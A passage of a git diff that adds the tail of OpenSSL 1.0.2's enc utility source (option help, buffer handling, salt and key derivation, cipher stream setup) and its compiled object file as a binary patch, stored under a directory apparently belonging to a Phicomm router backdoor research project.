+            BIO_printf(bio_err,
+                       "%-14s   from a passphrase.  One of md2, md5, sha or sha1\n",
+                       "");
+            BIO_printf(bio_err, "%-14s salt in hex is the next argument\n",
+                       "-S");
+            BIO_printf(bio_err, "%-14s key/iv in hex is the next argument\n",
+                       "-K/-iv");
+            BIO_printf(bio_err, "%-14s print the iv/key (then exit if -P)\n",
+                       "-[pP]");
+            BIO_printf(bio_err, "%-14s buffer size\n", "-bufsize <n>");
+            BIO_printf(bio_err, "%-14s disable standard block padding\n",
+                       "-nopad");
+#ifndef OPENSSL_NO_ENGINE
+            BIO_printf(bio_err,
+                       "%-14s use engine e, possibly a hardware device.\n",
+                       "-engine e");
+#endif
+
+            BIO_printf(bio_err, "Cipher Types\n");
+            OBJ_NAME_do_all_sorted(OBJ_NAME_TYPE_CIPHER_METH,
+                                   show_ciphers, bio_err);
+            BIO_printf(bio_err, "\n");
+
+            goto end;
+        }
+        argc--;
+        argv++;
+    }
+
+#ifndef OPENSSL_NO_ENGINE
+    setup_engine(bio_err, engine, 0);
+#endif
+
+    if (cipher && EVP_CIPHER_flags(cipher) & EVP_CIPH_FLAG_AEAD_CIPHER) {
+        BIO_printf(bio_err,
+                   "AEAD ciphers not supported by the enc utility\n");
+        goto end;
+    }
+
+    if (cipher && (EVP_CIPHER_mode(cipher) == EVP_CIPH_XTS_MODE)) {
+        BIO_printf(bio_err,
+                   "Ciphers in XTS mode are not supported by the enc utility\n");
+        goto end;
+    }
+
+    if (md && (dgst = EVP_get_digestbyname(md)) == NULL) {
+        BIO_printf(bio_err, "%s is an unsupported message digest type\n", md);
+        goto end;
+    }
+
+    if (dgst == NULL) {
+        dgst = EVP_md5();
+    }
+
+    if (bufsize != NULL) {
+        unsigned long n;
+
+        for (n = 0; *bufsize; bufsize++) {
+            i = *bufsize;
+            if ((i <= '9') && (i >= '0'))
+                n = n * 10 + i - '0';
+            else if (i == 'k') {
+                n *= 1024;
+                bufsize++;
+                break;
+            }
+        }
+        if (*bufsize != '\0') {
+            BIO_printf(bio_err, "invalid 'bufsize' specified.\n");
+            goto end;
+        }
+
+        /* It must be large enough for a base64 encoded line */
+        if (base64 && n < 80)
+            n = 80;
+
+        bsize = (int)n;
+        if (verbose)
+            BIO_printf(bio_err, "bufsize=%d\n", bsize);
+    }
+
+    strbuf = OPENSSL_malloc(SIZE);
+    buff = (unsigned char *)OPENSSL_malloc(EVP_ENCODE_LENGTH(bsize));
+    if ((buff == NULL) || (strbuf == NULL)) {
+        BIO_printf(bio_err, "OPENSSL_malloc failure %ld\n",
+                   (long)EVP_ENCODE_LENGTH(bsize));
+        goto end;
+    }
+
+    in = BIO_new(BIO_s_file());
+    out = BIO_new(BIO_s_file());
+    if ((in == NULL) || (out == NULL)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+    if (debug) {
+        BIO_set_callback(in, BIO_debug_callback);
+        BIO_set_callback(out, BIO_debug_callback);
+        BIO_set_callback_arg(in, (char *)bio_err);
+        BIO_set_callback_arg(out, (char *)bio_err);
+    }
+
+    if (inf == NULL) {
+#ifndef OPENSSL_NO_SETVBUF_IONBF
+        if (bufsize != NULL)
+            setvbuf(stdin, (char *)NULL, _IONBF, 0);
+#endif                          /* ndef OPENSSL_NO_SETVBUF_IONBF */
+        BIO_set_fp(in, stdin, BIO_NOCLOSE);
+    } else {
+        if (BIO_read_filename(in, inf) <= 0) {
+            perror(inf);
+            goto end;
+        }
+    }
+
+    if (!str && passarg) {
+        if (!app_passwd(bio_err, passarg, NULL, &pass, NULL)) {
+            BIO_printf(bio_err, "Error getting password\n");
+            goto end;
+        }
+        str = pass;
+    }
+
+    if ((str == NULL) && (cipher != NULL) && (hkey == NULL)) {
+        for (;;) {
+            char buf[200];
+
+            BIO_snprintf(buf, sizeof buf, "enter %s %s password:",
+                         OBJ_nid2ln(EVP_CIPHER_nid(cipher)),
+                         (enc) ? "encryption" : "decryption");
+            strbuf[0] = '\0';
+            i = EVP_read_pw_string((char *)strbuf, SIZE, buf, enc);
+            if (i == 0) {
+                if (strbuf[0] == '\0') {
+                    ret = 1;
+                    goto end;
+                }
+                str = strbuf;
+                break;
+            }
+            if (i < 0) {
+                BIO_printf(bio_err, "bad password read\n");
+                goto end;
+            }
+        }
+    }
+
+    if (outf == NULL) {
+        BIO_set_fp(out, stdout, BIO_NOCLOSE);
+#ifndef OPENSSL_NO_SETVBUF_IONBF
+        if (bufsize != NULL)
+            setvbuf(stdout, (char *)NULL, _IONBF, 0);
+#endif                          /* ndef OPENSSL_NO_SETVBUF_IONBF */
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+#endif
+    } else {
+        if (BIO_write_filename(out, outf) <= 0) {
+            perror(outf);
+            goto end;
+        }
+    }
+
+    rbio = in;
+    wbio = out;
+
+#ifdef ZLIB
+
+    if (do_zlib) {
+        if ((bzl = BIO_new(BIO_f_zlib())) == NULL)
+            goto end;
+        if (enc)
+            wbio = BIO_push(bzl, wbio);
+        else
+            rbio = BIO_push(bzl, rbio);
+    }
+#endif
+
+    if (base64) {
+        if ((b64 = BIO_new(BIO_f_base64())) == NULL)
+            goto end;
+        if (debug) {
+            BIO_set_callback(b64, BIO_debug_callback);
+            BIO_set_callback_arg(b64, (char *)bio_err);
+        }
+        if (olb64)
+            BIO_set_flags(b64, BIO_FLAGS_BASE64_NO_NL);
+        if (enc)
+            wbio = BIO_push(b64, wbio);
+        else
+            rbio = BIO_push(b64, rbio);
+    }
+
+    if (cipher != NULL) {
+        /*
+         * Note that str is NULL if a key was passed on the command line, so
+         * we get no salt in that case. Is this a bug?
+         */
+        if (str != NULL) {
+            /*
+             * Salt handling: if encrypting generate a salt and write to
+             * output BIO. If decrypting read salt from input BIO.
+             */
+            unsigned char *sptr;
+            if (nosalt)
+                sptr = NULL;
+            else {
+                if (enc) {
+                    if (hsalt) {
+                        if (!set_hex(hsalt, salt, sizeof salt)) {
+                            BIO_printf(bio_err, "invalid hex salt value\n");
+                            goto end;
+                        }
+                    } else if (RAND_pseudo_bytes(salt, sizeof salt) < 0)
+                        goto end;
+                    /*
+                     * If -P option then don't bother writing
+                     */
+                    if ((printkey != 2)
+                        && (BIO_write(wbio, magic,
+                                      sizeof magic - 1) != sizeof magic - 1
+                            || BIO_write(wbio,
+                                         (char *)salt,
+                                         sizeof salt) != sizeof salt)) {
+                        BIO_printf(bio_err, "error writing output file\n");
+                        goto end;
+                    }
+                } else if (BIO_read(rbio, mbuf, sizeof mbuf) != sizeof mbuf
+                           || BIO_read(rbio,
+                                       (unsigned char *)salt,
+                                       sizeof salt) != sizeof salt) {
+                    BIO_printf(bio_err, "error reading input file\n");
+                    goto end;
+                } else if (memcmp(mbuf, magic, sizeof magic - 1)) {
+                    BIO_printf(bio_err, "bad magic number\n");
+                    goto end;
+                }
+
+                sptr = salt;
+            }
+
+            EVP_BytesToKey(cipher, dgst, sptr,
+                           (unsigned char *)str, strlen(str), 1, key, iv);
+            /*
+             * zero the complete buffer or the string passed from the command
+             * line bug picked up by Larry J. Hughes Jr. <hughes@indiana.edu>
+             */
+            if (str == strbuf)
+                OPENSSL_cleanse(str, SIZE);
+            else
+                OPENSSL_cleanse(str, strlen(str));
+        }
+        if ((hiv != NULL) && !set_hex(hiv, iv, sizeof iv)) {
+            BIO_printf(bio_err, "invalid hex iv value\n");
+            goto end;
+        }
+        if ((hiv == NULL) && (str == NULL)
+            && EVP_CIPHER_iv_length(cipher) != 0) {
+            /*
+             * No IV was explicitly set and no IV was generated during
+             * EVP_BytesToKey. Hence the IV is undefined, making correct
+             * decryption impossible.
+             */
+            BIO_printf(bio_err, "iv undefined\n");
+            goto end;
+        }
+        if ((hkey != NULL) && !set_hex(hkey, key, sizeof key)) {
+            BIO_printf(bio_err, "invalid hex key value\n");
+            goto end;
+        }
+
+        if ((benc = BIO_new(BIO_f_cipher())) == NULL)
+            goto end;
+
+        /*
+         * Since we may be changing parameters work on the encryption context
+         * rather than calling BIO_set_cipher().
+         */
+
+        BIO_get_cipher_ctx(benc, &ctx);
+
+        if (non_fips_allow)
+            EVP_CIPHER_CTX_set_flags(ctx, EVP_CIPH_FLAG_NON_FIPS_ALLOW);
+
+        if (!EVP_CipherInit_ex(ctx, cipher, NULL, NULL, NULL, enc)) {
+            BIO_printf(bio_err, "Error setting cipher %s\n",
+                       EVP_CIPHER_name(cipher));
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+
+        if (nopad)
+            EVP_CIPHER_CTX_set_padding(ctx, 0);
+
+        if (!EVP_CipherInit_ex(ctx, NULL, NULL, key, iv, enc)) {
+            BIO_printf(bio_err, "Error setting cipher %s\n",
+                       EVP_CIPHER_name(cipher));
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+
+        if (debug) {
+            BIO_set_callback(benc, BIO_debug_callback);
+            BIO_set_callback_arg(benc, (char *)bio_err);
+        }
+
+        if (printkey) {
+            if (!nosalt) {
+                printf("salt=");
+                for (i = 0; i < (int)sizeof(salt); i++)
+                    printf("%02X", salt[i]);
+                printf("\n");
+            }
+            if (cipher->key_len > 0) {
+                printf("key=");
+                for (i = 0; i < cipher->key_len; i++)
+                    printf("%02X", key[i]);
+                printf("\n");
+            }
+            if (cipher->iv_len > 0) {
+                printf("iv =");
+                for (i = 0; i < cipher->iv_len; i++)
+                    printf("%02X", iv[i]);
+                printf("\n");
+            }
+            if (printkey == 2) {
+                ret = 0;
+                goto end;
+            }
+        }
+    }
+
+    /* Only encrypt/decrypt as we write the file */
+    if (benc != NULL)
+        wbio = BIO_push(benc, wbio);
+
+    for (;;) {
+        inl = BIO_read(rbio, (char *)buff, bsize);
+        if (inl <= 0)
+            break;
+        if (BIO_write(wbio, (char *)buff, inl) != inl) {
+            BIO_printf(bio_err, "error writing output file\n");
+            goto end;
+        }
+    }
+    if (!BIO_flush(wbio)) {
+        BIO_printf(bio_err, "bad decrypt\n");
+        goto end;
+    }
+
+    ret = 0;
+    if (verbose) {
+        BIO_printf(bio_err, "bytes read   :%8ld\n", BIO_number_read(in));
+        BIO_printf(bio_err, "bytes written:%8ld\n", BIO_number_written(out));
+    }
+ end:
+    ERR_print_errors(bio_err);
+    if (strbuf != NULL)
+        OPENSSL_free(strbuf);
+    if (buff != NULL)
+        OPENSSL_free(buff);
+    if (in != NULL)
+        BIO_free(in);
+    if (out != NULL)
+        BIO_free_all(out);
+    if (benc != NULL)
+        BIO_free(benc);
+    if (b64 != NULL)
+        BIO_free(b64);
+#ifdef ZLIB
+    if (bzl != NULL)
+        BIO_free(bzl);
+#endif
+    if (pass)
+        OPENSSL_free(pass);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+
+int set_hex(char *in, unsigned char *out, int size)
+{
+    int i, n;
+    unsigned char j;
+
+    n = strlen(in);
+    if (n > (size * 2)) {
+        BIO_printf(bio_err, "hex string is too long\n");
+        return (0);
+    }
+    memset(out, 0, size);
+    for (i = 0; i < n; i++) {
+        j = (unsigned char)*in;
+        *(in++) = '\0';
+        if (j == 0)
+            break;
+        if ((j >= '0') && (j <= '9'))
+            j -= '0';
+        else if ((j >= 'A') && (j <= 'F'))
+            j = j - 'A' + 10;
+        else if ((j >= 'a') && (j <= 'f'))
+            j = j - 'a' + 10;
+        else {
+            BIO_printf(bio_err, "non-hex digit\n");
+            return (0);
+        }
+        if (i & 1)
+            out[i / 2] |= j;
+        else
+            out[i / 2] = (j << 4);
+    }
+    return (1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..f819df3921fd7dae619404d34aaf3f6ab9406c3c
GIT binary patch
literal 21000
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
